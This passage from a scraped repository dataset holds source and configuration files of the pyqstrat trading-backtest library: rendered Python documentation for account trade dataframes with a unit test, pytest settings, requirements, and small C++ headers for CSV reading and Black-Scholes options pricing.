class=\"p\">,</span> \n <span class=\"n\">contract_group</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">,</span> \n <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Returns a dataframe of trades</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> contract_group: Return trades for this contract group. If None (default), include all contract groups</span>\n<span class=\"sd\"> start_date: Include trades with date greater than or equal to this timestamp.</span>\n<span class=\"sd\"> end_date: Include trades with date less than or equal to this timestamp.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">trades</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">trades</span><span class=\"p\">(</span><span class=\"n\">contract_group</span><span class=\"p\">,</span> <span class=\"n\">start_date</span><span class=\"p\">,</span> <span class=\"n\">end_date</span><span class=\"p\">)</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"o\">.</span><span class=\"n\">from_records</span><span class=\"p\">([(</span>\n <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span><span class=\"p\">,</span> \n <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"p\">,</span> \n <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">qty</span><span class=\"p\">,</span> \n <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">price</span><span class=\"p\">,</span> \n <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">fee</span><span class=\"p\">,</span> \n <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">commission</span><span class=\"p\">,</span> \n <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">order</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"p\">,</span> \n <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">order</span><span class=\"o\">.</span><span class=\"n\">qty</span><span class=\"p\">,</span> \n <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">order</span><span class=\"o\">.</span><span class=\"n\">reason_code</span><span class=\"p\">,</span> \n <span class=\"p\">(</span><span class=\"nb\">str</span><span class=\"p\">(</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">order</span><span class=\"o\">.</span><span class=\"n\">properties</span><span class=\"o\">.</span><span class=\"vm\">__dict__</span><span class=\"p\">)</span> <span class=\"k\">if</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">order</span><span class=\"o\">.</span><span class=\"n\">properties</span><span class=\"o\">.</span><span class=\"vm\">__dict__</span> <span class=\"k\">else</span> <span class=\"s1\">&#39;&#39;</span><span class=\"p\">),</span> \n <span class=\"p\">(</span><span class=\"nb\">str</span><span class=\"p\">(</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">properties</span><span class=\"o\">.</span><span class=\"vm\">__dict__</span><span class=\"p\">)</span> <span class=\"k\">if</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">properties</span><span class=\"o\">.</span><span class=\"vm\">__dict__</span> <span class=\"k\">else</span> <span class=\"s1\">&#39;&#39;</span><span class=\"p\">))</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">trades</span><span class=\"p\">],</span>\n <span class=\"n\">columns</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;symbol&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;qty&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;price&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;fee&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;commission&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;order_date&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;order_qty&#39;</span><span class=\"p\">,</span>\n <span class=\"s1\">&#39;reason_code&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;order_props&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;contract_props&#39;</span><span class=\"p\">])</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">df</span><span class=\"o\">.</span><span class=\"n\">sort_values</span><span class=\"p\">(</span><span class=\"n\">by</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;symbol&#39;</span><span class=\"p\">])</span>\n <span class=\"k\">return</span> <span class=\"n\">df</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.df_roundtrip_trades\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.df_roundtrip_trades\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">df_roundtrip_trades</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">contract_group</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">,</span> \n <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Returns a dataframe of round trip trades</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> contract_group: Return trades for this contract group. If None (default), include all contract groups</span>\n<span class=\"sd\"> start_date: Include trades with date greater than or equal to this timestamp.</span>\n<span class=\"sd\"> end_date: Include trades with date less than or equal to this timestamp.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">rt_trades</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">roundtrip_trades</span><span class=\"p\">(</span><span class=\"n\">contract_group</span><span class=\"p\">,</span> <span class=\"n\">start_date</span><span class=\"p\">,</span> <span class=\"n\">end_date</span><span class=\"p\">)</span>\n <span class=\"n\">df_rts</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"o\">.</span><span class=\"n\">from_records</span><span class=\"p\">([</span><span class=\"nb\">dict</span><span class=\"p\">(</span>\n <span class=\"n\">symbol</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span><span class=\"p\">,</span> \n <span class=\"n\">multiplier</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">multiplier</span><span class=\"p\">,</span> \n <span class=\"n\">entry_timestamp</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">entry_timestamp</span><span class=\"p\">,</span>\n <span class=\"n\">exit_timestamp</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">exit_timestamp</span><span class=\"p\">,</span>\n <span class=\"n\">qty</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">qty</span><span class=\"p\">,</span>\n <span class=\"n\">entry_price</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">entry_price</span><span class=\"p\">,</span>\n <span class=\"n\">exit_price</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">exit_price</span><span class=\"p\">,</span>\n <span class=\"n\">entry_reason</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">entry_reason</span><span class=\"p\">,</span>\n <span class=\"n\">exit_reason</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">exit_reason</span><span class=\"p\">,</span>\n <span class=\"n\">entry_commission</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">entry_commission</span><span class=\"p\">,</span>\n <span class=\"n\">exit_commission</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">exit_commission</span><span class=\"p\">,</span>\n <span class=\"n\">net_pnl</span><span class=\"o\">=</span><span class=\"n\">s</span><span class=\"o\">.</span><span class=\"n\">net_pnl</span><span class=\"p\">)</span> <span class=\"k\">for</span> <span class=\"n\">s</span> <span class=\"ow\">in</span> <span class=\"n\">rt_trades</span><span class=\"p\">])</span>\n <span class=\"n\">df_rts</span> <span class=\"o\">=</span> <span class=\"n\">df_rts</span><span class=\"o\">.</span><span class=\"n\">sort_values</span><span class=\"p\">(</span><span class=\"n\">by</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;entry_timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;symbol&#39;</span><span class=\"p\">])</span>\n <span class=\"k\">return</span> <span class=\"n\">df_rts</span></div></div>\n\n\n<div class=\"viewcode-block\" id=\"test_account\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.test_account\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">test_account</span><span class=\"p\">():</span>\n <span class=\"kn\">from</span> <span class=\"nn\">pyqstrat.pq_types</span> <span class=\"kn\">import</span> <span class=\"n\">MarketOrder</span>\n\n <span class=\"k\">def</span> <span class=\"nf\">get_close_price</span><span class=\"p\">(</span><span class=\"n\">contract</span><span class=\"p\">,</span> <span class=\"n\">timestamps</span><span class=\"p\">,</span> <span class=\"n\">idx</span><span class=\"p\">,</span> <span class=\"n\">strategy_context</span><span class=\"p\">):</span>\n <span class=\"k\">if</span> <span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span> <span class=\"o\">==</span> <span class=\"s2\">&quot;IBM&quot;</span><span class=\"p\">:</span>\n <span class=\"n\">price</span> <span class=\"o\">=</span> <span class=\"n\">idx</span> <span class=\"o\">+</span> <span class=\"mf\">10.1</span>\n <span class=\"k\">elif</span> <span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span> <span class=\"o\">==</span> <span class=\"s2\">&quot;MSFT&quot;</span><span class=\"p\">:</span>\n <span class=\"n\">price</span> <span class=\"o\">=</span> <span class=\"n\">idx</span> <span class=\"o\">+</span> <span class=\"mf\">15.3</span>\n <span class=\"k\">elif</span> <span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span> <span class=\"o\">==</span> <span class=\"s1\">&#39;AAPL&#39;</span><span class=\"p\">:</span>\n <span class=\"n\">price</span> <span class=\"o\">=</span> <span class=\"n\">idx</span> <span class=\"o\">+</span> <span class=\"mi\">10</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"k\">raise</span> <span class=\"ne\">Exception</span><span class=\"p\">(</span><span class=\"sa\">f</span><span class=\"s1\">&#39;unknown contract: </span><span class=\"si\">{</span><span class=\"n\">contract</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n <span class=\"k\">return</span> <span class=\"n\">price</span>\n\n <span class=\"n\">ContractGroup</span><span class=\"o\">.</span><span class=\"n\">clear</span><span class=\"p\">()</span>\n <span class=\"n\">Contract</span><span class=\"o\">.</span><span class=\"n\">clear</span><span class=\"p\">()</span>\n <span class=\"n\">ibm_cg</span> <span class=\"o\">=</span> <span class=\"n\">ContractGroup</span><span class=\"o\">.</span><span class=\"n\">create</span><span class=\"p\">(</span><span class=\"s1\">&#39;IBM&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">msft_cg</span> <span class=\"o\">=</span> <span class=\"n\">ContractGroup</span><span class=\"o\">.</span><span class=\"n\">create</span><span class=\"p\">(</span><span class=\"s1\">&#39;MSFT&#39;</span><span class=\"p\">)</span>\n\n <span class=\"n\">ibm_contract</span> <span class=\"o\">=</span> <span class=\"n\">Contract</span><span class=\"o\">.</span><span class=\"n\">create</span><span class=\"p\">(</span><span class=\"s1\">&#39;IBM&#39;</span><span class=\"p\">,</span> <span class=\"n\">contract_group</span><span class=\"o\">=</span><span class=\"n\">ibm_cg</span><span class=\"p\">)</span>\n <span class=\"n\">msft_contract</span> <span class=\"o\">=</span> <span class=\"n\">Contract</span><span class=\"o\">.</span><span class=\"n\">create</span><span class=\"p\">(</span><span class=\"s1\">&#39;MSFT&#39;</span><span class=\"p\">,</span> <span class=\"n\">contract_group</span><span class=\"o\">=</span><span class=\"n\">msft_cg</span><span class=\"p\">)</span>\n\n <span class=\"n\">timestamps</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">array</span><span class=\"p\">([</span><span class=\"s1\">&#39;2018-01-01 09:00&#39;</span><span class=\"p\">,</span>\n <span class=\"s1\">&#39;2018-01-02 08:00&#39;</span><span class=\"p\">,</span> \n <span class=\"s1\">&#39;2018-01-02 09:00&#39;</span><span class=\"p\">,</span> \n <span class=\"s1\">&#39;2018-01-05 13:35&#39;</span><span class=\"p\">,</span>\n <span class=\"s1\">&#39;2018-01-05 13:36&#39;</span><span class=\"p\">],</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"s1\">&#39;M8[m]&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">trade_1</span> <span class=\"o\">=</span> <span class=\"n\">Trade</span><span class=\"p\">(</span><span class=\"n\">ibm_contract</span><span class=\"p\">,</span> <span class=\"n\">MarketOrder</span><span class=\"p\">(</span><span class=\"n\">ibm_contract</span><span class=\"p\">,</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">(</span><span class=\"s1\">&#39;2018-01-01 09:00&#39;</span><span class=\"p\">),</span> <span class=\"mi\">10</span><span class=\"p\">),</span> \n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">(</span><span class=\"s1\">&#39;2018-01-02 08:00&#39;</span><span class=\"p\">),</span> <span class=\"mi\">10</span><span class=\"p\">,</span> <span class=\"mf\">10.1</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"o\">=</span><span class=\"mf\">0.01</span><span class=\"p\">)</span>\n <span class=\"n\">trade_2</span> <span class=\"o\">=</span> <span class=\"n\">Trade</span><span class=\"p\">(</span><span class=\"n\">ibm_contract</span><span class=\"p\">,</span> <span class=\"n\">MarketOrder</span><span class=\"p\">(</span><span class=\"n\">ibm_contract</span><span class=\"p\">,</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">(</span><span class=\"s1\">&#39;2018-01-01 09:00&#39;</span><span class=\"p\">),</span> <span class=\"o\">-</span><span class=\"mi\">20</span><span class=\"p\">),</span>\n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">(</span><span class=\"s1\">&#39;2018-01-02 09:00&#39;</span><span class=\"p\">),</span> <span class=\"o\">-</span><span class=\"mi\">20</span><span class=\"p\">,</span> <span class=\"mf\">15.1</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"o\">=</span><span class=\"mf\">0.02</span><span class=\"p\">)</span>\n <span class=\"n\">trade_3</span> <span class=\"o\">=</span> <span class=\"n\">Trade</span><span class=\"p\">(</span><span class=\"n\">msft_contract</span><span class=\"p\">,</span> <span class=\"n\">MarketOrder</span><span class=\"p\">(</span><span class=\"n\">msft_contract</span><span class=\"p\">,</span> <span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">1</span><span class=\"p\">],</span> <span class=\"mi\">15</span><span class=\"p\">),</span> <span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">1</span><span class=\"p\">],</span> <span class=\"mi\">20</span><span class=\"p\">,</span> <span class=\"mf\">13.2</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"o\">=</span><span class=\"mf\">0.04</span><span class=\"p\">)</span>\n <span class=\"n\">trade_4</span> <span class=\"o\">=</span> <span class=\"n\">Trade</span><span class=\"p\">(</span><span class=\"n\">msft_contract</span><span class=\"p\">,</span> <span class=\"n\">MarketOrder</span><span class=\"p\">(</span><span class=\"n\">msft_contract</span><span class=\"p\">,</span> <span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">],</span> <span class=\"mi\">20</span><span class=\"p\">),</span> <span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">],</span> <span class=\"mi\">20</span><span class=\"p\">,</span> <span class=\"mf\">16.2</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"o\">=</span><span class=\"mf\">0.05</span><span class=\"p\">)</span>\n <span class=\"n\">trade_5</span> <span class=\"o\">=</span> <span class=\"n\">Trade</span><span class=\"p\">(</span><span class=\"n\">msft_contract</span><span class=\"p\">,</span> <span class=\"n\">MarketOrder</span><span class=\"p\">(</span><span class=\"n\">msft_contract</span><span class=\"p\">,</span> <span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">],</span> <span class=\"mi\">5</span><span class=\"p\">),</span> <span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">],</span> <span class=\"mi\">5</span><span class=\"p\">,</span> <span class=\"mf\">16.21</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"o\">=</span><span class=\"mf\">0.03</span><span class=\"p\">)</span>\n\n <span class=\"n\">account</span> <span class=\"o\">=</span> <span class=\"n\">Account</span><span class=\"p\">([</span><span class=\"n\">ibm_cg</span><span class=\"p\">,</span> <span class=\"n\">msft_cg</span><span class=\"p\">],</span> <span class=\"n\">timestamps</span><span class=\"p\">,</span> <span class=\"n\">get_close_price</span><span class=\"p\">,</span> <span class=\"kc\">None</span><span class=\"p\">)</span>\n <span class=\"n\">account</span><span class=\"o\">.</span><span class=\"n\">add_trades</span><span class=\"p\">([</span><span class=\"n\">trade_1</span><span class=\"p\">,</span> <span class=\"n\">trade_2</span><span class=\"p\">,</span> <span class=\"n\">trade_3</span><span class=\"p\">,</span> <span class=\"n\">trade_4</span><span class=\"p\">,</span> <span class=\"n\">trade_5</span><span class=\"p\">])</span>\n <span class=\"n\">account</span><span class=\"o\">.</span><span class=\"n\">calc</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">(</span><span class=\"s1\">&#39;2018-01-05 13:35&#39;</span><span class=\"p\">))</span>\n\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">account</span><span class=\"o\">.</span><span class=\"n\">df_trades</span><span class=\"p\">())</span> <span class=\"o\">==</span> <span class=\"mi\">5</span><span class=\"p\">)</span>\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">account</span><span class=\"o\">.</span><span class=\"n\">df_pnl</span><span class=\"p\">())</span> <span class=\"o\">==</span> <span class=\"mi\">6</span><span class=\"p\">)</span>\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">allclose</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">array</span><span class=\"p\">([</span><span class=\"mf\">9.99</span><span class=\"p\">,</span> <span class=\"mf\">61.96</span><span class=\"p\">,</span> <span class=\"mf\">79.97</span><span class=\"p\">,</span> <span class=\"mf\">109.33</span><span class=\"p\">,</span> <span class=\"mf\">69.97</span><span class=\"p\">,</span> <span class=\"mf\">154.33</span><span class=\"p\">]),</span> <span class=\"n\">account</span><span class=\"o\">.</span><span class=\"n\">df_pnl</span><span class=\"p\">()</span><span class=\"o\">.</span><span class=\"n\">net_pnl</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">rtol</span><span class=\"o\">=</span><span class=\"mi\">0</span><span class=\"p\">))</span>\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">allclose</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">array</span><span class=\"p\">([</span><span class=\"mi\">10</span><span class=\"p\">,</span> <span class=\"mi\">20</span><span class=\"p\">,</span> <span class=\"o\">-</span><span class=\"mi\">10</span><span class=\"p\">,</span> <span class=\"mi\">45</span><span class=\"p\">,</span> <span class=\"o\">-</span><span class=\"mi\">10</span><span class=\"p\">,</span> <span class=\"mi\">45</span><span class=\"p\">]),</span> <span class=\"n\">account</span><span class=\"o\">.</span><span class=\"n\">df_pnl</span><span class=\"p\">()</span><span class=\"o\">.</span><span class=\"n\">position</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">rtol</span><span class=\"o\">=</span><span class=\"mi\">0</span><span class=\"p\">))</span>\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">allclose</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">array</span><span class=\"p\">([</span><span class=\"mf\">1000000.</span><span class=\"p\">,</span> <span class=\"mf\">1000189.3</span><span class=\"p\">,</span> <span class=\"mf\">1000224.3</span><span class=\"p\">]),</span> <span class=\"n\">account</span><span class=\"o\">.</span><span class=\"n\">df_account_pnl</span><span class=\"p\">()</span><span class=\"o\">.</span><span class=\"n\">equity</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">rtol</span><span class=\"o\">=</span><span class=\"mi\">0</span><span class=\"p\">))</span></div>\n\n\n<span class=\"k\">if</span> <span class=\"vm\">__name__</span> <span class=\"o\">==</span> <span class=\"s2\">&quot;__main__&quot;</span><span class=\"p\">:</span>\n <span class=\"n\">test_account</span><span class=\"p\">()</span>\n <span class=\"kn\">import</span> <span class=\"nn\">doctest</span>\n <span class=\"n\">doctest</span><span class=\"o\">.</span><span class=\"n\">testmod</span><span class=\"p\">(</span><span class=\"n\">optionflags</span><span class=\"o\">=</span><span class=\"n\">doctest</span><span class=\"o\">.</span><span class=\"n\">NORMALIZE_WHITESPACE</span><span class=\"p\">)</span>\n<span class=\"c1\"># $$_end_code</span>\n</pre></div>\n\n </div>\n \n </div>\n </div>\n <div class=\"sphinxsidebar\" role=\"navigation\" aria-label=\"main navigation\">\n <div class=\"sphinxsidebarwrapper\">\n<h1 class=\"logo\"><a href=\"../../index.html\">pyqstrat</a></h1>\n\n\n\n\n\n\n\n\n<h3>Navigation</h3>\n<p class=\"caption\" role=\"heading\"><span class=\"caption-text\">Contents:</span></p>\n<ul>\n<li class=\"toctree-l1\"><a class=\"reference internal\" href=\"../../modules.html\">pyqstrat</a></li>\n</ul>\n\n<div class=\"relations\">\n<h3>Related Topics</h3>\n<ul>\n <li><a href=\"../../index.html\">Documentation overview</a><ul>\n <li><a href=\"../index.html\">Module code</a><ul>\n </ul></li>\n </ul></li>\n</ul>\n</div>\n<div id=\"searchbox\" style=\"display: none\" role=\"search\">\n <h3 id=\"searchlabel\">Quick search</h3>\n <div class=\"searchformwrapper\">\n <form class=\"search\" action=\"../../search.html\" method=\"get\">\n <input type=\"text\" name=\"q\" aria-labelledby=\"searchlabel\" autocomplete=\"off\" autocorrect=\"off\" autocapitalize=\"off\" spellcheck=\"false\"/>\n <input type=\"submit\" value=\"Go\" />\n </form>\n </div>\n</div>\n<script>document.getElementById('searchbox').style.display = \"block\"</script>\n\n\n\n\n\n\n\n\n </div>\n </div>\n <div class=\"clearer\"></div>\n </div>\n <div class=\"footer\">\n &copy;2018, Sal Abbasi.\n \n |\n Powered by <a href=\"http://sphinx-doc.org/\">Sphinx 5.1.1</a>\n &amp; <a href=\"https://github.com/bitprophet/alabaster\">Alabaster 0.7.12</a>\n \n </div>\n\n \n\n \n </body>\n</html>" }, { "alpha_fraction": 0.7870370149612427, "alphanum_fraction": 0.7870370149612427, "avg_line_length": 26.25, "blob_id": "e59664e08d27ebb44efe99d657009dddd20f6f7e", "content_id": "cd6a0c37531ce2c5afd98a3985080372f1fe4bb1", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 108, "license_type": "permissive", "max_line_length": 51, "num_lines": 4, "path": "/pytest.ini", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "[pytest]\npython_files = *.py\naddopts = --doctest-modules\ndoctest_optionflags = NORMALIZE_WHITESPACE ELLIPSIS" }, { "alpha_fraction": 0.5719178318977356, "alphanum_fraction": 0.5890411138534546, "avg_line_length": 14.368420600891113, "blob_id": "0a714abbe49c0adce90db97d5ff88579f859d46f", "content_id": "b22cb9c1fcd29e10eebd79faea81b5241576eb32", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 292, "license_type": "permissive", "max_line_length": 41, "num_lines": 19, "path": "/pyqstrat/cpp/io/main.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// main.cpp\n// testcpp\n//\n// Created by Sal Abbasi on 9/6/22.\n//\n\n#include <iostream>\n#include <string>\n#include \"csv_reader.hpp\"\n\nusing namespace std;\n\nint main(int argc, const char * argv[]) {\n //test_zip_reader();\n test_csv_reader_zip();\n std::cout << \"done\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.557692289352417, "alphanum_fraction": 0.7259615659713745, "avg_line_length": 13.785714149475098, "blob_id": "5fd0db9fc83a52e83843709f1152cb9cfa3e4f01", "content_id": "7f56d832e33ec079b39460617eb20386a6b0710c", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 208, "license_type": "permissive", "max_line_length": 26, "num_lines": 14, "path": "/requirements.txt", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "pandas>=0.22\nnumpy>=1.14\nmatplotlib>=2.2.2\nscipy>=1.0.0\nstatsmodels>=0.11\nipython>=6.5.0\npybind11>=2.2\nsortedcontainers>=2.0.5\nh5py>=2.9\nipywidgets>=7.5\nplotly>=4.10\ntypes-python-dateutil>=0.1\ncython\npyyaml\n\n" }, { "alpha_fraction": 0.5412843823432922, "alphanum_fraction": 0.5565749406814575, "avg_line_length": 14.571428298950195, "blob_id": "dc05fe11a6be763dc5c5142327c7b7dcd2070d2f", "content_id": "5e7de870259e118e3c8ea5ef5450de36373fc0f3", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 327, "license_type": "permissive", "max_line_length": 63, "num_lines": 21, "path": "/pyqstrat/cpp/io/utils.hpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// utils.hpp\n// py_c_test\n//\n// Created by Sal Abbasi on 9/12/22.\n//\n\n#ifndef utils_hpp\n#define utils_hpp\n\n#include <string.h>\n#include <sstream>\n\n#define error(msg) \\\n{ \\\nstd::ostringstream os; \\\nos << msg << \" file: \" << __FILE__ << \" line: \" << __LINE__ ; \\\nthrow std::runtime_error(os.str()); \\\n}\n\n#endif /* utils_hpp */\n" }, { "alpha_fraction": 0.715678334236145, "alphanum_fraction": 0.7254264950752258, "avg_line_length": 48.20000076293945, "blob_id": "ec68e100c011268c95cf5def95f28e449e8f8be0", "content_id": "e1928eb652e349bed4c9616a1e001ae8f6e6b941", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1231, "license_type": "permissive", "max_line_length": 130, "num_lines": 25, "path": "/pyqstrat/cpp/options/options.hpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "#ifndef options_hpp\n#define options_hpp\n\n// Black Scholes options calculations from www.jaeckel.org/LetsBeRational.7z\n\ndouble pdf(double x);\ndouble cdf(double x);\ndouble d1(double S, double K, double t, double r, double sigma, double q = 0);\ndouble d2(double S, double K, double t, double r, double sigma, double q = 0);\ndouble black_scholes_price(bool call, double S, double K, double t, double r, double sigma, double q = 0);\ndouble delta(bool call, double S, double K, double t, double 